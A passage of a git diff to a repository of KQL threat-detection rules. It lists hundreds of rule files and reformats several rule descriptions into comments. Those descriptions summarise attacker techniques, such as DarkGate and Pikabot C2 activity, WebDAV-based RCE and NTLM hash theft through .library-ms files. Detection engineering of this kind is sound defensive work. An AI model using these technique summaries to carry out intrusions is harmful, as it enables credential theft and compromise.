3 +-- ...ly_suspicious_jwt_token_search_via_cli.kql | 5 ++-- ...stry_export_of_third_party_credentials.kql | 3 +-- .../sensitive_file_dump_via_wbadmin_exe.kql | 3 +-- ...e_recovery_from_backup_via_wbadmin_exe.kql | 3 +-- ...e_access_to_browser_credential_storage.kql | 5 ++-- ...p_file_created_by_uncommon_application.kql | 1 - ...add_insecure_download_source_to_winget.kql | 3 +-- ...river_disallowed_on_dev_drive_registry.kql | 1 - ...bitrary_file_download_via_squirrel_exe.kql | 1 - .../audit_policy_tampering_via_auditpol.kql | 3 +-- ...tampering_via_nt_resource_kit_auditpol.kql | 3 +-- .../audit_rules_deleted_via_auditctl.kql | 5 ++-- .../baaupdate_exe_suspicious_dll_load.kql | 5 ++-- ...cial_processes_with_improper_arguments.kql | 5 ++-- .../bitlockertogo_exe_execution.kql | 7 +++--- ...ation_via_mode_com_to_russian_language.kql | 3 +-- .../com_object_execution_via_xwizard_exe.kql | 3 +-- .../creation_of_non_existent_system_dll.kql | 3 +-- .../devicecredentialdeployment_execution.kql | 1 - .../directory_removal_via_rmdir.kql | 7 +++--- ...ore_mode_dsrm_registry_value_tampering.kql | 11 ++++----- ...der_wmi_autologger_session_via_reg_exe.kql | 5 ++-- ...de_uncommon_script_extension_execution.kql | 3 +-- ...splaying_hidden_files_feature_disabled.kql | 3 +-- .../dll_sideloading_of_shellchromeapi_dll.kql | 3 +-- ..._to_disallowed_images_in_hvci_registry.kql | 1 - .../dynamic_csharp_compile_artefact.kql | 5 ++-- ...amper_in_net_processes_via_commandline.kql | 3 +-- .../etw_trace_evasion_activity.kql | 1 - .../evtx_created_in_uncommon_location.kql | 5 ++-- ...tion_of_suspicious_file_type_extension.kql | 3 +-- .../explorer_process_tree_break.kql | 3 +-- .../Defense Evasion/file_deletion_via_del.kql | 7 +++--- ...ile_download_using_protocolhandler_exe.kql | 1 - .../file_download_via_installutil_exe.kql | 1 - ...stem_dll_name_in_unsuspected_locations.kql | 3 +-- ..._process_name_in_unsuspected_locations.kql | 3 +-- ...orfiles_exe_child_process_masquerading.kql | 1 - .../fsutil_suspicious_invocation.kql | 3 +-- .../hacktool_edrsilencer_execution.kql | 1 - ...et_on_file_directory_via_chflags_macos.kql | 3 +-- ...e_schedule_task_via_index_value_tamper.kql | 3 +-- ...ecialaccounts_registry_key_commandline.kql | 1 - ...visor_enforced_code_integrity_disabled.kql | 1 - ...r_enforced_paging_translation_disabled.kql | 1 - ..._to_mycomputer_zone_for_http_protocols.kql | 1 - ...log_deletion_via_commandline_utilities.kql | 3 +-- ...xecution_from_script_file_via_bash_exe.kql | 3 +-- ..._inline_command_execution_via_bash_exe.kql | 3 +-- ...itive_subfolder_search_via_findstr_exe.kql | 1 - ..._new_package_via_winget_local_manifest.kql | 5 ++-- ...lorer_disablefirstruncustomize_enabled.kql | 1 - .../jscript_compiler_execution.kql | 3 +-- ...ol_binary_copied_from_system_directory.kql | 1 - ...on_by_microsoft_visual_studio_debugger.kql | 5 ++-- ...nents_file_execution_by_taef_detection.kql | 3 +-- .../maxmpxct_registry_value_changed.kql | 5 ++-- .../msdt_execution_via_answer_file.kql | 1 - ...cution_with_suspicious_file_extensions.kql | 7 +++--- ...ll_runhtmlapplication_suspicious_usage.kql | 1 - .../msiexec_quiet_installation.kql | 3 +-- .../Defense Evasion/msxsl_exe_execution.kql | 3 +-- ..._connection_initiated_by_addinutil_exe.kql | 3 +-- ...capture_session_launched_via_dxcap_exe.kql | 1 - ..._certificate_installed_via_certmgr_exe.kql | 3 +-- ...certificate_installed_via_certutil_exe.kql | 3 +-- ...l_msi_install_via_windowsinstaller_com.kql | 9 ++++--- ...xecution_of_malicious_embedded_scripts.kql | 3 +-- ...work_connection_initiated_by_cmstp_exe.kql | 3 +-- .../pdf_file_created_by_regedit_exe.kql | 3 +-- ...cation_whitelisting_bypass_via_dnx_exe.kql | 3 +-- .../potential_base64_decoded_from_images.kql | 1 - ...icode_characters_from_suspicious_image.kql | 3 +-- ...nse_evasion_via_right_to_left_override.kql | 3 +-- ...al_fake_instance_of_hxtsr_exe_executed.kql | 5 ++-- ...d_via_ms_appinstaller_protocol_handler.kql | 3 +-- ...ation_via_ntfs_index_allocation_stream.kql | 1 - ...n_via_ntfs_index_allocation_stream_cli.kql | 1 - ...lyph_attack_using_lookalike_characters.kql | 5 ++-- ...using_lookalike_characters_in_filename.kql | 5 ++-- ...ential_lsass_process_dump_via_procdump.kql | 7 +++--- ..._pendingfilerenameoperations_tampering.kql | 1 - ...tial_persistence_via_outlook_home_page.kql | 3 +-- ...ial_persistence_via_outlook_today_page.kql | 3 +-- ...potential_powershell_execution_via_dll.kql | 3 +-- ...potential_suspicious_mofcomp_execution.kql | 5 ++-- ...s_windows_feature_enabled_proccreation.kql | 3 +-- ...y_suspicious_cmd_shell_output_redirect.kql | 3 +-- ...n_from_parent_process_in_public_folder.kql | 1 - ...spicious_ping_copy_command_combination.kql | 1 - ...ous_rundll32_exe_execution_of_udl_file.kql | 3 +-- ...y_suspicious_wdac_policy_file_creation.kql | 1 - ..._suspicious_wuauclt_network_connection.kql | 3 +-- ...fault_action_set_to_allow_or_noaction_.kql | 5 ++-- ...executed_from_headless_conhost_process.kql | 3 +-- .../process_memory_dump_via_dotnet_dump.kql | 1 - ...ocess_proxy_execution_via_squirrel_exe.kql | 1 - .../proxy_execution_via_vshadow.kql | 5 ++-- .../pua_process_hacker_execution.kql | 5 ++-- ...ion_security_warning_disabled_in_excel.kql | 3 +-- ...ity_warning_disabled_in_excel_registry.kql | 3 +-- ...ython_image_load_by_non_python_process.kql | 5 ++-- .../rdp_sensitive_settings_changed.kql | 3 +-- ...rdp_sensitive_settings_changed_to_zero.kql | 3 +-- ...ion_without_commandline_flags_or_files.kql | 3 +-- .../remote_file_download_via_findstr_exe.kql | 1 - .../remove_scheduled_cron_task_job.kql | 3 +-- .../renamed_procdump_execution.kql | 3 +-- .../runmru_registry_key_deletion.kql | 5 ++-- .../runmru_registry_key_deletion_registry.kql | 5 ++-- ...e_from_potentially_suspicious_location.kql | 3 +-- ...ted_in_potentially_suspicious_location.kql | 5 ++-- ...files_as_system_files_using_attrib_exe.kql | 1 - ..._access_agent_update_utility_execution.kql | 3 +-- .../suspicious_calculator_usage.kql | 1 - ...cious_copy_from_or_to_system_directory.kql | 3 +-- .../suspicious_customshellhost_execution.kql | 1 - ...aring_or_configuration_change_activity.kql | 3 +-- .../suspicious_executable_file_creation.kql | 3 +-- ...ious_lnk_double_extension_file_created.kql | 1 - ...spicious_msiexec_execute_arbitrary_dll.kql | 3 +-- ...eyboard_layout_ime_file_registry_value.kql | 5 ++-- ...us_process_masquerading_as_svchost_exe.kql | 3 +-- ..._via_werfaultsecure_through_edr_freeze.kql | 1 - ...ous_procexp152_sys_file_created_in_tmp.kql | 3 +-- .../suspicious_service_installed.kql | 3 +-- ...ious_shellexec_rundll_call_via_ordinal.kql | 3 +-- ...us_speech_runtime_binary_child_process.kql | 3 +-- ...indows_defender_feature_via_powershell.kql | 1 - ...ous_volume_shadow_copy_vss_ps_dll_load.kql | 5 ++-- ...der_registry_key_tampering_via_reg_exe.kql | 1 - .../suspicious_windows_service_tampering.kql | 1 - ...ous_windows_update_agent_empty_cmdline.kql | 1 - ...uspicious_wordpad_outbound_connections.kql | 3 +-- ...earing_or_removal_via_system_utilities.kql | 1 - .../sysmon_driver_altitude_change.kql | 3 +-- ...system_file_execution_location_anomaly.kql | 1 - ...information_discovery_via_sysctl_macos.kql | 3 +-- .../taskkill_symantec_endpoint_protection.kql | 5 ++-- ...on_addinutil_exe_commandline_execution.kql | 1 - ...ncommon_child_process_of_addinutil_exe.kql | 1 - .../uncommon_child_process_of_appvlp_exe.kql | 7 +++--- .../uncommon_child_process_of_setres_exe.kql | 5 ++-- ...eyboard_layout_ime_file_registry_value.kql | 5 ++-- ..._file_creation_by_mysql_daemon_process.kql | 3 +-- ..._filesystem_load_attempt_by_format_com.kql | 1 - .../uncommon_link_exe_parent_process.kql | 9 ++++--- .../uncommon_outbound_kerberos_connection.kql | 1 - .../uncommon_sigverif_exe_child_process.kql | 1 - .../weak_or_abused_passwords_in_cli.kql | 3 +-- .../wfp_filter_added_via_registry.kql | 1 - .../windows_defender_context_menu_removed.kql | 5 ++-- ...ndows_defender_exclusion_list_modified.kql | 1 - ...hreat_severity_default_action_modified.kql | 5 ++-- ...exe_uncommon_argument_or_child_process.kql | 3 +-- .../write_protect_for_storage_disabled.kql | 3 +-- ...mon_locations_via_presentationhost_exe.kql | 1 - .../xsl_script_execution_via_wmic_exe.kql | 5 ++-- ..._monitoring_agent_registry_keys_access.kql | 3 +-- ...th_service_agents_registry_keys_access.kql | 7 +++--- .../file_and_directory_discovery_linux.kql | 1 - ..._subfolder_enumeration_via_dir_command.kql | 1 - ...ing_explorer_folder_shortcut_via_shell.kql | 1 - .../Discovery/hacktool_certipy_execution.kql | 1 - .../hacktool_soaphound_execution.kql | 1 - ...cal_groups_reconnaissance_via_wmic_exe.kql | 7 +++--- .../Discovery/network_sniffing_macos.kql | 3 +-- .../os_architecture_discovery_via_grep.kql | 1 - ...scan_binary_data_transmission_activity.kql | 3 +-- .../Discovery/pua_adidnsdump_execution.kql | 3 +-- .../pua_softperfect_netscan_execution.kql | 3 +-- .../Discovery/pua_trufflehog_execution.kql | 5 ++-- .../pua_trufflehog_execution_linux.kql | 5 ++-- ...on_command_output_piped_to_findstr_exe.kql | 3 +-- ...y_tools_keyword_lookup_via_findstr_exe.kql | 3 +-- .../Discovery/shell_execution_gcc_linux.kql | 1 - .../shell_execution_via_find_linux.kql | 1 - .../shell_execution_via_flock_linux.kql | 1 - .../shell_execution_via_nice_linux.kql | 1 - .../shell_invocation_via_apt_linux.kql | 3 +-- ..._reconnaissance_activity_using_net_exe.kql | 3 +-- .../Discovery/suspicious_where_execution.kql | 5 ++-- ...stem_information_discovery_using_ioreg.kql | 5 ++-- ...mation_discovery_using_system_profiler.kql | 3 +-- ...stem_integrity_protection_sip_disabled.kql | 1 - ...m_integrity_protection_sip_enumeration.kql | 1 - ...ction_to_active_directory_web_services.kql | 1 - ...tem_information_discovery_via_wmic_exe.kql | 7 +++--- .../Discovery/vim_gtfobin_abuse_linux.kql | 3 +-- ...sembly_dll_creation_via_aspnetcompiler.kql | 1 - ..._exe_from_potentially_suspicious_paths.kql | 1 - .../capsh_shell_invocation_linux.kql | 1 - ...ing_space_characters_execution_anomaly.kql | 3 +-- ...t_potentially_suspicious_child_process.kql | 3 +-- ...ta_export_from_mssql_table_via_bcp_exe.kql | 3 +-- ..._of_powershell_execution_via_sqlps_exe.kql | 3 +-- ...nternals_suspicious_powershell_cmdlets.kql | 3 +-- ...process_from_browser_file_upload_abuse.kql | 5 ++-- .../Execution/forfiles_command_execution.kql | 5 ++-- .../fsutil_behavior_set_symlinkevaluation.kql | 3 +-- ...hacktool_sharpwsus_wsuspendu_execution.kql | 3 +-- ...mputer_zone_for_http_protocols_via_cli.kql | 1 - ...tion_spawn_shell_via_os_system_library.kql | 1 - .../installation_of_wsl_kali_linux.kql | 3 +-- KQL/rules/Execution/jamf_mdm_execution.kql | 1 - ...security_stopped_via_commandline_linux.kql | 3 +-- .../mmc_loading_script_engines_dlls.kql | 3 +-- .../nodejs_execution_of_javascript_file.kql | 7 +++--- ...ted_network_connection_to_non_local_ip.kql | 5 ++-- ...nnection_initiated_by_microsoft_dialer.kql | 5 ++-- ...arbitrary_file_download_via_cmdl32_exe.kql | 5 ++-- ...inary_impersonating_sysinternals_tools.kql | 5 ++-- ...al_clickfix_execution_pattern_registry.kql | 7 +++--- ...tial_dll_injection_via_acccheckconsole.kql | 5 ++-- ..._spoofing_using_right_to_left_override.kql | 1 - .../Execution/potential_php_reverse_shell.kql | 3 +-- ...duct_class_reconnaissance_via_wmic_exe.kql | 5 ++-- ...er_launch_from_document_reader_process.kql | 1 - ...d_executed_via_run_dialog_box_registry.kql | 3 +-- ...e_dll_loaded_by_non_powershell_process.kql | 3 +-- ...dowsinstaller_com_from_remote_location.kql | 7 +++--- ...l_execution_via_pty_and_socket_modules.kql | 1 - ...hon_spawning_pretty_tty_via_pty_module.kql | 1 - ...with_known_revoked_signing_certificate.kql | 7 +++--- ...cess_tool_screenconnect_temporary_file.kql | 3 +-- .../service_reconnaissance_via_wmic_exe.kql | 7 +++--- .../shell_execution_via_git_linux.kql | 1 - .../shell_execution_via_rsync_linux.kql | 1 - ...shell_invocation_via_env_command_linux.kql | 1 - .../shell_invocation_via_ssh_linux.kql | 1 - ...ent_tools_powershell_session_detection.kql | 3 +-- ...s_deno_file_written_from_remote_source.kql | 3 +-- ...load_and_execute_pattern_via_curl_wget.kql | 7 +++--- ...s_electron_application_child_processes.kql | 1 - ...th_whitespace_padding_clickfix_filefix.kql | 5 ++-- ...ious_invocation_of_shell_via_awk_linux.kql | 3 +-- ...spicious_invocation_of_shell_via_rsync.kql | 1 - ...cters_in_runmru_registry_path_clickfix.kql | 1 - ...rs_in_typedpaths_registry_path_filefix.kql | 1 - ...and_volume_reconnaissance_via_wmic_exe.kql | 5 ++-- .../Execution/use_of_fsharp_interpreters.kql | 3 +-- ...process_located_in_suspicious_location.kql | 3 +-- ..._download_via_configsecuritypolicy_exe.kql | 5 ++-- ...n_to_ngrok_tunneling_service_initiated.kql | 5 ++-- ...nnection_initiated_to_btunnels_domains.kql | 3 +-- ...itiated_to_cloudflared_tunnels_domains.kql | 3 +-- ...nection_initiated_to_devtunnels_domain.kql | 1 - ...etwork_connection_initiated_to_mega_nz.kql | 3 +-- ...d_to_visual_studio_code_tunnels_domain.kql | 1 - ...ted_network_connection_to_ngrok_domain.kql | 5 ++-- .../pua_restic_backup_tool_execution.kql | 5 ++-- .../python_webserver_execution_linux.kql | 5 ++-- .../suspicious_outbound_smtp_connections.kql | 3 +-- ...bdav_client_execution_via_rundll32_exe.kql | 1 - ...bdav_client_execution_via_rundll32_exe.kql | 3 +-- .../all_backups_deleted_via_wbadmin_exe.kql | 5 ++-- ...eleted_data_overwritten_via_cipher_exe.kql | 5 ++-- ...e_recovery_from_backup_via_wbadmin_exe.kql | 3 +-- ...f_rstrtmgr_dll_by_a_suspicious_process.kql | 5 ++-- ...of_rstrtmgr_dll_by_an_uncommon_process.kql | 5 ++-- ...added_to_time_machine_via_tmutil_macos.kql | 3 +-- ...e_access_via_volume_shadow_copy_backup.kql | 1 - ...ckup_deletion_attempt_via_tmutil_macos.kql | 3 +-- ...chine_backup_disabled_via_tmutil_macos.kql | 3 +-- ...windows_backup_deleted_via_wbadmin_exe.kql | 5 ++-- ...very_environment_disabled_via_reagentc.kql | 5 ++-- ..._image_mount_indicator_in_recent_files.kql | 3 +-- .../office_macro_file_download.kql | 3 +-- ...created_in_outlook_temporary_directory.kql | 3 +-- ..._write_to_sharepoint_layouts_directory.kql | 3 +-- ...ine_padding_with_whitespace_characters.kql | 7 +++--- .../hacktool_sharpmove_tool_execution.kql | 1 - ...top_connection_initiated_via_mstsc_exe.kql | 3 +-- ...dp_connections_over_non_standard_tools.kql | 3 +-- ...eral_movement_via_activatemicrosoftapp.kql | 1 - ...eral_movement_via_windows_remote_shell.kql | 1 - .../winrs_local_command_execution.kql | 3 +-- ..._hijackig_via_additional_space_in_path.kql | 3 +-- .../dns_over_https_enabled_by_registry.kql | 5 ++-- .../Persistence/enable_lm_hash_storage.kql | 3 +-- .../enable_lm_hash_storage_proccreation.kql | 3 +-- .../hacktool_powerup_write_hijack_dll.kql | 5 ++-- ...ropped_in_the_teams_or_onedrive_folder.kql | 3 +-- ...sk_system_power_settings_via_systemctl.kql | 5 ++-- .../monitoring_for_persistence_via_bits.kql | 7 +++--- ...enassemblyusagelog_registry_key_tamper.kql | 5 ++-- ...ders_registered_with_uncommon_dll_name.kql | 5 ++-- ...tence_via_disk_cleanup_handler_autorun.kql | 11 ++++----- .../persistence_via_sticky_key_backdoor.kql | 3 +-- .../potential_azure_browser_sso_abuse.kql | 3 +-- ...tstrike_service_installations_registry.kql | 1 - ...rsistence_attempt_via_errorhandler_cmd.kql | 3 +-- ...ence_via_disk_cleanup_handler_registry.kql | 11 ++++----- ...tential_persistence_via_lsa_extensions.kql | 3 +-- ...m_database_persistence_via_sdbinst_exe.kql | 3 +-- ...esktop_background_change_using_reg_exe.kql | 3 +-- ...desktop_background_change_via_registry.kql | 3 +-- ...picious_malware_callback_communication.kql | 1 - ...s_malware_callback_communication_linux.kql | 1 - ...er_creation_by_non_sysinternals_binary.kql | 3 +-- .../register_new_ifiltre_for_persistence.kql | 3 +-- ...gistry_manipulation_via_wmi_stdregprov.kql | 5 ++-- ...ccess_tool_anydesk_incoming_connection.kql | 1 - ...m_viewer_session_started_on_linux_host.kql | 3 +-- ...m_viewer_session_started_on_macos_host.kql | 3 +-- ...viewer_session_started_on_windows_host.kql | 3 +-- ..._potential_com_hijacking_registry_keys.kql | 3 +-- ...ctedadminmode_registry_value_tampering.kql | 5 ++-- ..._registry_value_tampering_proccreation.kql | 5 ++-- ...sabled_via_minint_registry_key_process.kql | 5 ++-- ...d_via_minint_registry_key_registry_set.kql | 5 ++-- KQL/rules/Persistence/servicedll_hijack.kql | 3 +-- .../startup_item_file_created_macos.kql | 5 ++-- ...s_file_write_to_webapps_root_directory.kql | 3 +-- ...spicious_process_by_web_server_process.kql | 1 - ...uspicious_screensave_change_by_reg_exe.kql | 3 +-- .../suspicious_vboxdrvinst_exe_parameters.kql | 5 ++-- ..._bypass_via_windows_directory_spoofing.kql | 3 +-- ..._database_installation_via_sdbinst_exe.kql | 3 +-- ...digest_credguard_registry_modification.kql | 5 ++-- .../webshell_hacking_activity_patterns.kql | 1 - .../webshell_tool_reconnaissance_activity.kql | 1 - ...inlogon_allowmultipletssessions_enable.kql | 5 ++-- ...d_port_monitor_persistence_in_registry.kql | 3 +-- .../bypass_uac_using_silentcleanup_task.kql | 5 ++-- ...le_association_to_executable_via_assoc.kql | 3 +-- ...nge_default_file_association_via_assoc.kql | 3 +-- ...ng_service_imagepath_value_via_reg_exe.kql | 5 ++-- ...ion_exe_for_service_with_unquoted_path.kql | 3 +-- ..._rdp_port_changed_to_non_standard_port.kql | 5 ++-- .../hacktool_hollowreaper_execution.kql | 3 +-- .../hacktool_sharpdpapi_execution.kql | 3 +-- ...or_privilege_escalation_tool_execution.kql | 3 +-- .../linux_sudo_chroot_execution.kql | 7 +++--- ...k_connection_initiated_via_notepad_exe.kql | 5 ++-- .../new_custom_shim_database_created.kql | 3 +-- ..._registered_from_a_suspicious_location.kql | 1 - .../password_set_to_never_expire_via_wmi.kql | 1 - ...dll_sideloading_via_deviceenroller_exe.kql | 3 +-- ...istence_via_app_paths_default_property.kql | 7 +++--- ...via_appcompat_registerapprestart_layer.kql | 5 ++-- ..._via_microsoft_compatibility_appraiser.kql | 3 +-- ...ntial_persistence_via_netsh_helper_dll.kql | 1 - ...sistence_via_netsh_helper_dll_registry.kql | 1 - ...istence_via_shim_database_modification.kql | 3 +-- ...sistence_attempt_via_windows_telemetry.kql | 7 +++--- ...ential_ripzip_attack_on_startup_folder.kql | 5 ++-- ...hortcut_persistence_via_powershell_exe.kql | 7 +++--- ...th_curl_and_powershell_execution_combo.kql | 3 +-- .../scheduled_task_job_at.kql | 3 +-- ...rovider_ssp_added_to_lsa_configuration.kql | 1 - ...p16_exe_execution_with_custom_lst_file.kql | 5 ++-- ...ious_autorun_registry_modified_via_wmi.kql | 1 - .../suspicious_get_variable_exe_creation.kql | 5 ++-- ...icious_modification_of_scheduled_tasks.kql | 5 ++-- ...cious_screensaver_binary_file_creation.kql | 3 +-- .../suspicious_startup_folder_persistence.kql | 5 ++-- .../tasks_folder_evasion.kql | 5 ++-- .../Privilege Escalation/uac_disabled.kql | 1 - .../uac_notification_disabled.kql | 5 ++-- .../uac_secure_desktop_prompt_disabled.kql | 5 ++-- ...vent_log_access_tampering_via_registry.kql | 1 - .../winlogon_notify_key_logon_persistence.kql | 3 +-- ...ar_creating_files_in_startup_locations.kql | 3 +-- .../writing_local_admin_share.kql | 3 +-- ...xe_execution_from_non_default_location.kql | 3 +-- ...ion_from_potentially_suspicious_parent.kql | 1 - .../vhd_image_download_via_browser.kql | 3 +-- helper.py | 12 +++++++++- 562 files changed, 668 insertions(+), 1233 deletions(-) diff --git a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql index bb9424a1..2aede8b8 100644 --- a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql +++ b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql @@ -3,10 +3,9 @@ // Date: 2023-10-15 // Level: medium // Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. -This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs -process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other -processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable. - +// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs +// process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other +// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql index 0a5e25ac..2fdaa157 100644 --- a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql +++ b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql @@ -3,7 +3,6 @@ // Date: 2024-06-22 // Level: high // Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql index e47bc5f3..b15a1eeb 100644 --- a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql +++ b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql @@ -3,9 +3,8 @@ // Date: 2025-06-13 // Level: high // Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053 -by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from -attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc. - +// by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from +// attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053 diff --git a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql index 80fa7bfe..d3f51ba4 100644 --- a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql +++ b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql @@ -3,8 +3,7 @@ // Date: 2023-10-27 // Level: high // Description: Detects the execution of rundll32 that leads to an external network connection. -The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. - +// The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1573, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql index 03825d48..83b98d03 100644 --- a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql +++ b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql @@ -3,8 +3,7 @@ // Date: 2025-04-20 // Level: medium // Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction. -If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker. - +// If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker. // MITRE Tactic: Credential Access // Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054 // False Positives: diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql index 692bb84b..9993a698 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql @@ -3,7 +3,6 @@ // Date: 2023-10-24 // Level: high // Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql index 7a0c8949..4f3041d9 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql @@ -3,8 +3,7 @@ // Date: 2020-06-09 // Level: critical // Description: Detects FlowCloud malware registry markers from threat group TA410. -The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components. - +// The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql index 60558d63..e188b769 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql @@ -3,8 +3,7 @@ // Date: 2024-04-23 // Level: high // Description: Detects the creation of specific files inside of ProgramData directory. -These files were seen being created by Forest Blizzard as described by MSFT. - +// These files were seen being created by Forest Blizzard as described by MSFT. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql index 14293f5b..cad7ef5f 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql @@ -3,8 +3,7 @@ // Date: 2024-04-23 // Level: medium // Description: Detects the creation of JavaScript files inside of the DriverStore directory. -Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. - +// Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql index 4ffc2e1e..f57c76cd 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql @@ -3,8 +3,7 @@ // Date: 2024-04-23 // Level: high // Description: Detects the execution of specific processes and command line combination. -These were seen being created by Forest Blizzard as described by MSFT. - +// These were seen being created by Forest Blizzard as described by MSFT. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql index a98cb4ca..6a337236 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql @@ -3,7 +3,6 @@ // Date: 2024-07-03 // Level: high // Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, 